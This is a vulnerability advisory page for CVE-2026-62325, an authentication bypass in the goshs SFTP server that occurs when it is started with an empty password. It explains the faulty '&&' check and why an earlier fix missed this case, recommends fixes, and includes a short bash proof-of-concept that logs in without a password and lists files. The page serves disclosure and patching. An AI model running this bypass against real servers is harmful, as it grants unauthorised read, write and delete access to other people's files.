CVE Watchtower


← Back to CVE List

CVE-2026-62325NVD

Vulnerability Summary

## Summary

Start goshs v2.1.3 with `-b 'admin:' -sftp`. No `-fkf`. SFTP accepts connections without password. CVE-2026-40884 blocks the empty-username variant (`-b ':pass'`). The empty-password variant bypasses that fix.

## CVE-2026-40884

**CVE-2026-40884** (GHSA-c29w-qq4m-2gcv, Apr 13 2026) reported the empty-username case: `-b ':pass'` with `-sftp`. `sftpserver.go:85` uses `&&`:

```go
if s.Username != "" && s.Password != "" {
sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool {
return subtle.ConstantTimeCompare([]byte(ctx.User()), []byte(s.Username)) == 1 && subtle.ConstantTimeCompare([]byte(password), []byte(s.Password)) == 1
}
}
```

Empty username → `Username != ""` false → `PasswordHandler` nil. No `-fkf` means `PublicKeyHandler` also nil. gliderlabs/ssh sees all handlers nil and sets `NoClientAuth = true`. Unauthenticated access.

Patrickhener fixed it with a sanity check at `sanity/checks.go:114-118`:

```go
if opts.FTP && opts.FTPSFTPMode && strings.HasPrefix(opts.BasicAuth, ":") {
logger.Fatal("When using SFTP with password authentication, the username cannot be empty. ...")
}
```

`HasPrefix(":")` catches empty username. It does not catch empty password.

## Empty Password Bypass

Same `&&` at `sftpserver.go:85`. Same nil handler. Different input:

```
goshs -b 'admin:' -sftp
```

- `Username = "admin"`, `Password = ""`
- `Username != "" && Password != ""` → false. Password is empty.
- `PasswordHandler` not set. No `-fkf` → `PublicKeyHandler` not set.
- gliderlabs/ssh → `NoClientAuth = true`.

CVE-2026-40884 patched the symptom (empty username) with input validation. Root cause (`&&`) stayed in the code. v2.1.3 still has it. That makes any unanticipated input format exploitable.

## PoC

```bash
#!/usr/bin/env bash
set -euo pipefail

HOST="${1:-127.0.0.1}"
PORT="${2:-2121}"

echo "[*] Connecting to goshs SFTP at $HOST:$PORT with empty password..."
echo "ls -la /" | sftp -o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o PreferredAuthentications=none,password \
-o PubkeyAuthentication=no \
-P "$PORT" -b - admin@"$HOST" 2>&1 && \
echo "[+] VULNERABLE: Connected without password!" || \
echo "[-] Connection failed (patched or not running)"
```

## Root Cause

```go
// Wrong: &&
if s.Username != "" && s.Password != "" {

// Correct: ||
if s.Username != "" || s.Password != "" {
```

`&&` blocks `PasswordHandler` when either field is empty. `||` installs it when either field is set.

## Incomplete Fix

Patrickhener added `HasPrefix(":")` at `sanity/checks.go:116`. Two gaps remain:

1. `&&` still at `sftpserver.go:85` in v2.1.3
2. No `HasSuffix(":")` check for empty password

## Impact

- Unauthenticated SFTP file access (read, write, delete, rename)
- Same impact as CVE-2026-40884 via a different input
- Exploitable with `-b 'user:'` and no `-fkf`

## Affected

All goshs versions including v2.1.3. CVE-2026-40884 fix does not cover this variant.

## Recommended Fix

1. `&&` → `||` at `sftpserver/sftpserver.go:85`
2. `HasSuffix(":")` check at `sanity/checks.go`
3. Shared auth handler setup for HTTP and SFTP code paths
Severity Level
CRITICAL(9.1)
Published Date
Jul 28, 2026
Last Modified
Jul 28, 2026
Exploitation Status
No confirmed exploitation yet
EPSS Score (30-Day)
Data Pending
Root Weakness (CWE)
N/A
CVSS v3.1 Base Metrics
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
ConfidentialityHigh
IntegrityHigh
AvailabilityNone

External References